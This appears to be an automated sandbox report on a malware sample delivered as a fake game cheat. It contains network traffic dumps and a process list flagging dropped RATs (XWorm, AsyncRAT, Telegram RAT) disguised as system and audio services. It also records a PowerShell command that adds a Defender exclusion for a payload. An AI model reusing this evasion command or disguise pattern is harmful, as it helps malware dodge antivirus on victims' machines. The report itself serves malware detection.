                                                                                                                                                                                                                                                                                    2024-11-23 20:12:55 UTC1369INData Raw: 3b 72 2e 75 73 65 45 66 66 65 63 74 28 28 29 3d 3e 7b 73 65 74 54 69 6d 65 6f 75 74 28 6b 2c 35 30 30 29 7d 2c 5b 5d 29 2c 72 2e 75 73 65 45 66 66 65 63 74 28 28 29 3d 3e 7b 69 66 28 52 3e 3d 44 2e 6c 65 6e 67 74 68 29 7b 6e 75 6c 6c 3d 3d 70 7c 7c 70 28 29 3b 72 65 74 75 72 6e 7d 6b 28 29 7d 2c 5b 52 2c 6b 5d 29 3b 6c 65 74 20 77 3d 5b 5d 3b 66 6f 72 28 6c 65 74 20 65 3d 30 3b 65 3c 33 3b 65 2b 2b 29 7b 6c 65 74 7b 74 79 70 65 3a 74 7d 3d 44 5b 65 5d 3b 73 77 69 74 63 68 28 74 29 7b 63 61 73 65 22 64 61 79 22 3a 77 2e 70 75 73 68 28 7b 6b 65 79 3a 22 64 61 79 22 2c 69 6e 70 75 74 3a 28 30 2c 69 2e 6a 73 78 29 28 78 2c 7b 6f 70 74 69 6f 6e 73 3a 67 2c 73 65 6c 65 63 74 4f 70 74 69 6f 6e 3a 62 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 69 2e 6a 73 78 29 28 75
                                                                                                                                                                                                                                                                                    Data Ascii: ;r.useEffect(()=>{setTimeout(k,500)},[]),r.useEffect(()=>{if(R>=D.length){null==p||p();return}k()},[R,k]);let w=[];for(let e=0;e<3;e++){let{type:t}=D[e];switch(t){case"day":w.push({key:"day",input:(0,i.jsx)(x,{options:g,selectOption:b,children:(0,i.jsx)(u
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:55 UTC1369INData Raw: 29 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 69 2e 6a 73 78 29 28 63 2e 46 6f 72 6d 54 69 74 6c 65 2c 7b 74 61 67 3a 22 6c 65 67 65 6e 64 22 2c 72 65 71 75 69 72 65 64 3a 76 2c 65 72 72 6f 72 3a 6a 2c 63 68 69 6c 64 72 65 6e 3a 64 2e 69 6e 74 6c 2e 73 74 72 69 6e 67 28 64 2e 74 2e 78 4e 70 46 4a 79 29 7d 29 2c 28 30 2c 69 2e 6a 73 78 29 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 68 2e 69 6e 70 75 74 73 2c 63 68 69 6c 64 72 65 6e 3a 77 2e 6d 61 70 28 28 65 2c 74 29 3d 3e 7b 6c 65 74 7b 6b 65 79 3a 6e 2c 69 6e 70 75 74 3a 72 7d 3d 65 3b 72 65 74 75 72 6e 28 30 2c 69 2e 6a 73 78 29 28 22 64 69 76 22 2c 7b 74 61 62 49 6e 64 65 78 3a 74 2b 31 2c 63 6c 61 73 73 4e 61 6d 65 3a 68 5b 6e 5d 2c 63 68 69 6c 64 72 65 6e 3a 72 7d 2c 6e 29 7d 29 7d 29 5d 7d
                                                                                                                                                                                                                                                                                    Data Ascii: ),children:[(0,i.jsx)(c.FormTitle,{tag:"legend",required:v,error:j,children:d.intl.string(d.t.xNpFJy)}),(0,i.jsx)("div",{className:h.inputs,children:w.map((e,t)=>{let{key:n,input:r}=e;return(0,i.jsx)("div",{tabIndex:t+1,className:h[n],children:r},n)})})]}
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:55 UTC1369INData Raw: 73 70 6c 61 79 20 4e 61 6d 65 22 2c 6f 2e 41 43 43 4f 55 4e 54 5f 49 4e 46 4f 52 4d 41 54 49 4f 4e 3d 22 41 63 63 6f 75 6e 74 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 22 2c 6f 2e 41 47 45 5f 47 41 54 45 3d 22 41 67 65 20 47 61 74 65 22 2c 6f 2e 41 47 45 5f 47 41 54 45 5f 55 4e 44 45 52 41 47 45 3d 22 41 67 65 20 47 61 74 65 20 55 6e 64 65 72 61 67 65 22 2c 6f 2e 50 48 4f 4e 45 5f 56 45 52 49 46 49 43 41 54 49 4f 4e 3d 22 50 68 6f 6e 65 20 56 65 72 69 66 69 63 61 74 69 6f 6e 22 2c 6f 2e 52 45 47 49 53 54 45 52 3d 22 52 65 67 69 73 74 65 72 22 2c 6f 2e 43 41 50 54 43 48 41 3d 22 43 61 70 74 63 68 61 22 7d 2c 32 30 31 32 30 37 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 69 3d 6e 28 38 31 38 30 38 33 29 3b 74 2e 5a 3d 28 30 2c 69 2e 42 29 28 7b
                                                                                                                                                                                                                                                                                    Data Ascii: splay Name",o.ACCOUNT_INFORMATION="Account Information",o.AGE_GATE="Age Gate",o.AGE_GATE_UNDERAGE="Age Gate Underage",o.PHONE_VERIFICATION="Phone Verification",o.REGISTER="Register",o.CAPTCHA="Captcha"},201207:function(e,t,n){var i=n(818083);t.Z=(0,i.B)({
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:55 UTC1369INData Raw: 6e 20 6d 28 65 29 7b 6c 65 74 7b 69 6e 76 69 74 65 3a 74 3d 6e 75 6c 6c 2c 67 69 66 74 43 6f 64 65 53 4b 55 49 64 3a 6e 3d 6e 75 6c 6c 2c 2e 2e 2e 69 7d 3d 65 3b 72 65 74 75 72 6e 20 66 28 7b 2e 2e 2e 69 2c 69 6e 76 69 74 65 3a 74 2c 67 69 66 74 43 6f 64 65 53 4b 55 49 64 3a 6e 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 29 7b 6c 65 74 7b 65 6d 61 69 6c 3a 74 2c 70 68 6f 6e 65 54 6f 6b 65 6e 3a 6e 2c 75 73 65 72 6e 61 6d 65 3a 69 2c 67 6c 6f 62 61 6c 4e 61 6d 65 3a 6d 2c 63 6f 6e 73 65 6e 74 3a 66 2c 70 61 73 73 77 6f 72 64 3a 78 2c 67 75 69 6c 64 54 65 6d 70 6c 61 74 65 43 6f 64 65 3a 5f 2c 62 69 72 74 68 64 61 79 3a 45 2c 69 6e 76 69 74 65 3a 76 3d 6e 75 6c 6c 2c 67 69 66 74 43 6f 64 65 53 4b 55 49 64 3a 49 3d 6e 75 6c 6c 2c 6d 75 6c 74 69 53 74 65 70
                                                                                                                                                                                                                                                                                    Data Ascii: n m(e){let{invite:t=null,giftCodeSKUId:n=null,...i}=e;return f({...i,invite:t,giftCodeSKUId:n})}function f(e){let{email:t,phoneToken:n,username:i,globalName:m,consent:f,password:x,guildTemplateCode:_,birthday:E,invite:v=null,giftCodeSKUId:I=null,multiStep
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:55 UTC1369INData Raw: 6f 6e 3a 67 2e 41 6c 2e 41 47 45 5f 47 41 54 45 5f 53 55 43 43 45 53 53 7d 29 7d 2c 65 3d 3e 7b 6c 65 74 20 74 3d 6e 65 77 20 61 2e 5a 28 65 29 3b 74 68 72 6f 77 20 6c 2e 5a 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 52 45 47 49 53 54 45 52 5f 46 41 49 4c 55 52 45 22 2c 65 72 72 6f 72 3a 74 7d 29 2c 6e 75 6c 6c 21 3d 74 2e 67 65 74 46 69 65 6c 64 45 72 72 6f 72 73 28 22 64 61 74 65 5f 6f 66 5f 62 69 72 74 68 22 29 26 26 6f 2e 77 45 28 67 2e 4c 30 2e 52 45 47 49 53 54 45 52 29 2c 75 2e 64 65 66 61 75 6c 74 2e 74 72 61 63 6b 28 70 2e 72 4d 78 2e 52 45 47 49 53 54 45 52 5f 53 55 42 4d 49 54 5f 45 52 52 4f 52 45 44 2c 7b 69 73 5f 75 6e 69 71 75 65 5f 75 73 65 72 6e 61 6d 65 5f 72 65 67 69 73 74 72 61 74 69 6f 6e 3a 21 30 2c 65 6d 61 69 6c 5f 65 72 72
                                                                                                                                                                                                                                                                                    Data Ascii: on:g.Al.AGE_GATE_SUCCESS})},e=>{let t=new a.Z(e);throw l.Z.dispatch({type:"REGISTER_FAILURE",error:t}),null!=t.getFieldErrors("date_of_birth")&&o.wE(g.L0.REGISTER),u.default.track(p.rMx.REGISTER_SUBMIT_ERRORED,{is_unique_username_registration:!0,email_err
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:55 UTC1369INData Raw: 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 76 61 6c 75 65 3a 6e 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 7d 29 3a 65 5b 74 5d 3d 6e 2c 65 7d 61 2e 5a 50 2e 69 6e 69 74 69 61 6c 69 7a 65 28 29 3b 63 6c 61 73 73 20 5f 20 65 78 74 65 6e 64 73 28 69 3d 73 2e 50 75 72 65 43 6f 6d 70 6f 6e 65 6e 74 29 7b 63 6f 6d 70 6f 6e 65 6e 74 44 69 64 4d 6f 75 6e 74 28 29 7b 6c 65 74 20 65 3d 28 30 2c 68 2e 5a 29 28 74 68 69 73 2e 70 72 6f 70 73 2e 6c 6f 63 61 74 69 6f 6e 29 2c 74 3d 28 30 2c 6c 2e 70 61 72 73 65 29 28 74 68 69 73 2e 70 72 6f 70 73 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 29 3b 6f 2e 74 6e 2e 70 6f 73 74 28 7b 75 72 6c 3a 67 2e 41 4e 4d 2e 44 49
                                                                                                                                                                                                                                                                                    Data Ascii: .defineProperty(e,t,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[t]=n,e}a.ZP.initialize();class _ extends(i=s.PureComponent){componentDidMount(){let e=(0,h.Z)(this.props.location),t=(0,l.parse)(this.props.location.search);o.tn.post({url:g.ANM.DI
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:55 UTC1369INData Raw: 6d 38 2c 63 68 69 6c 64 72 65 6e 3a 6d 2e 69 6e 74 6c 2e 73 74 72 69 6e 67 28 6d 2e 74 2e 6f 78 39 68 49 53 29 7d 29 2c 28 30 2c 72 2e 6a 73 78 29 28 70 2e 44 4b 2c 7b 63 68 69 6c 64 72 65 6e 3a 6d 2e 69 6e 74 6c 2e 73 74 72 69 6e 67 28 6d 2e 74 5b 22 2f 64 63 75 52 30 22 5d 29 7d 29 2c 28 30 2c 72 2e 6a 73 78 29 28 70 2e 7a 78 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 66 2e 6d 61 72 67 69 6e 54 6f 70 34 30 2c 6f 6e 43 6c 69 63 6b 3a 28 29 3d 3e 74 28 65 29 2c 63 68 69 6c 64 72 65 6e 3a 6d 2e 69 6e 74 6c 2e 73 74 72 69 6e 67 28 6d 2e 74 2e 66 49 76 31 36 4f 29 7d 29 5d 7d 29 7d 72 65 6e 64 65 72 28 29 7b 6c 65 74 7b 62 75 73 79 3a 65 2c 73 75 63 63 65 73 73 3a 74 7d 3d 74 68 69 73 2e 73 74 61 74 65 3b 72 65 74 75 72 6e 20 65 3f 74 68 69 73 2e 72 65 6e 64 65 72
                                                                                                                                                                                                                                                                                    Data Ascii: m8,children:m.intl.string(m.t.ox9hIS)}),(0,r.jsx)(p.DK,{children:m.intl.string(m.t["/dcuR0"])}),(0,r.jsx)(p.zx,{className:f.marginTop40,onClick:()=>t(e),children:m.intl.string(m.t.fIv16O)})]})}render(){let{busy:e,success:t}=this.state;return e?this.render
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:55 UTC1369INData Raw: 3d 6e 2e 6e 28 73 29 2c 61 3d 6e 28 34 34 32 38 33 37 29 2c 6f 3d 6e 28 34 38 31 30 36 30 29 2c 63 3d 6e 28 31 34 34 31 31 34 29 2c 75 3d 6e 28 37 34 32 34 35 38 29 2c 64 3d 6e 28 35 34 31 36 39 32 29 2c 68 3d 6e 28 39 35 32 38 30 32 29 2c 70 3d 6e 28 33 38 38 39 30 35 29 2c 67 3d 6e 28 38 31 35 36 36 30 29 2c 6d 3d 6e 28 33 38 38 30 33 32 29 2c 66 3d 6e 28 37 33 39 30 31 37 29 2c 78 3d 6e 28 31 31 33 32 30 37 29 3b 74 2e 5a 3d 28 29 3d 3e 7b 6c 65 74 5b 65 2c 74 5d 3d 72 2e 75 73 65 53 74 61 74 65 28 22 22 29 2c 5b 73 2c 5f 5d 3d 72 2e 75 73 65 53 74 61 74 65 28 22 22 29 2c 5b 45 2c 76 5d 3d 72 2e 75 73 65 53 74 61 74 65 28 21 31 29 2c 5b 49 2c 62 5d 3d 72 2e 75 73 65 53 74 61 74 65 28 21 31 29 2c 5b 4e 2c 43 5d 3d 72 2e 75 73 65 53 74 61 74 65 28 6e 75
                                                                                                                                                                                                                                                                                    Data Ascii: =n.n(s),a=n(442837),o=n(481060),c=n(144114),u=n(742458),d=n(541692),h=n(952802),p=n(388905),g=n(815660),m=n(388032),f=n(739017),x=n(113207);t.Z=()=>{let[e,t]=r.useState(""),[s,_]=r.useState(""),[E,v]=r.useState(!1),[I,b]=r.useState(!1),[N,C]=r.useState(nu
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:55 UTC1369INData Raw: 2c 6f 6e 43 68 61 6e 67 65 3a 5f 2c 6d 61 78 4c 65 6e 67 74 68 3a 67 2e 7a 2c 65 72 72 6f 72 3a 53 7d 29 2c 28 30 2c 69 2e 6a 73 78 29 28 70 2e 7a 78 2c 7b 73 69 7a 65 3a 70 2e 7a 78 2e 53 69 7a 65 73 2e 53 4d 41 4c 4c 2c 6c 6f 6f 6b 3a 70 2e 7a 78 2e 4c 6f 6f 6b 73 2e 4c 49 4e 4b 2c 6f 6e 43 6c 69 63 6b 3a 5a 2c 63 68 69 6c 64 72 65 6e 3a 6d 2e 69 6e 74 6c 2e 73 74 72 69 6e 67 28 6d 2e 74 5b 22 35 62 36 30 67 6f 22 5d 29 7d 29 2c 28 30 2c 69 2e 6a 73 78 29 28 70 2e 7a 78 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 78 2e 6d 61 72 67 69 6e 54 6f 70 32 30 2c 6f 6e 43 6c 69 63 6b 3a 52 2c 73 75 62 6d 69 74 74 69 6e 67 3a 45 2c 63 68 69 6c 64 72 65 6e 3a 6d 2e 69 6e 74 6c 2e 73 74 72 69 6e 67 28 6d 2e 74 2e 69 34 6a 65 57 56 29 7d 29 5d 7d 29 5d 7d 29 7d 7d 2c 36 31
                                                                                                                                                                                                                                                                                    Data Ascii: ,onChange:_,maxLength:g.z,error:S}),(0,i.jsx)(p.zx,{size:p.zx.Sizes.SMALL,look:p.zx.Looks.LINK,onClick:Z,children:m.intl.string(m.t["5b60go"])}),(0,i.jsx)(p.zx,{className:x.marginTop20,onClick:R,submitting:E,children:m.intl.string(m.t.i4jeWV)})]})]})}},61


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                    149192.168.2.54986513.107.246.63443
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:55 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                    Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:55 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Date: Sat, 23 Nov 2024 20:12:55 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/xml
                                                                                                                                                                                                                                                                                    Content-Length: 407
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                                                                                                    ETag: "0x8DC582B9D30478D"
                                                                                                                                                                                                                                                                                    x-ms-request-id: 0ecd932e-001e-0066-5d4b-3c561e000000
                                                                                                                                                                                                                                                                                    x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                    x-azure-ref: 20241123T201255Z-15b8b599d882l6clhC1TEBxd5c000000038g00000000dkvf
                                                                                                                                                                                                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                    X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                    2024-11-23 20:12:55 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                                                                                                                    Start time:15:12:00
                                                                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Users\user\Desktop\EsgeCzT4do.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\EsgeCzT4do.exe"
                                                                                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                                                                                    File size:3'260'216 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:82A95B30418E5C4C3CBA62B7805B09C9
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:2
                                                                                                                                                                                                                                                                                    Start time:15:12:00
                                                                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe"
                                                                                                                                                                                                                                                                                    Imagebase:0xb0000
                                                                                                                                                                                                                                                                                    File size:54'784 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:CE3E5F8613EA049B651549EBA3E3AA28
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000000.2043414047.00000000000B2000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000002.00000000.2043414047.00000000000B2000.00000002.00000001.01000000.00000005.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe, Author: ditekSHen
                                                                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                                    • Detection: 79%, ReversingLabs
                                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                                                    Target ID:3
                                                                                                                                                                                                                                                                                    Start time:15:12:00
                                                                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exe"
                                                                                                                                                                                                                                                                                    Imagebase:0xca0000
                                                                                                                                                                                                                                                                                    File size:88'064 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:17F122079462E212871A1E2EB20EAFF9
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000000.2044758866.0000000000CA2000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000000.2044758866.0000000000CA2000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000000.2044758866.0000000000CA2000.00000002.00000001.01000000.00000006.sdmp, Author: ditekSHen
                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exe, Author: ditekSHen
                                                                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                                                                    • Detection: 100%, Avira
                                                                                                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                                    • Detection: 92%, ReversingLabs
                                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                                                    Target ID:4
                                                                                                                                                                                                                                                                                    Start time:15:12:00
                                                                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exe"
                                                                                                                                                                                                                                                                                    Imagebase:0x1db14c70000
                                                                                                                                                                                                                                                                                    File size:3'730'944 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:38023663C5BBA5E8D46CEE0612E57A51
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000000.2045244894.000001DB14D2F000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                                                                    • Detection: 49%, ReversingLabs
                                                                                                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                                                    Target ID:5
                                                                                                                                                                                                                                                                                    Start time:15:12:01
                                                                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                                                    Target ID:7
                                                                                                                                                                                                                                                                                    Start time:15:12:05
                                                                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://discord.gg/BNXa5rYFXM
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff715980000
                                                                                                                                                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                                                    Target ID:8
                                                                                                                                                                                                                                                                                    Start time:15:12:06
                                                                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2108 --field-trial-handle=1920,i,15032320318420577648,13703191311739689731,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff715980000
                                                                                                                                                                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                                                    Target ID:9
                                                                                                                                                                                                                                                                                    Start time:15:12:06
                                                                                                                                                                                                                                                                                    Start date:23/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Realtek HD Audio Universal Service.exe'
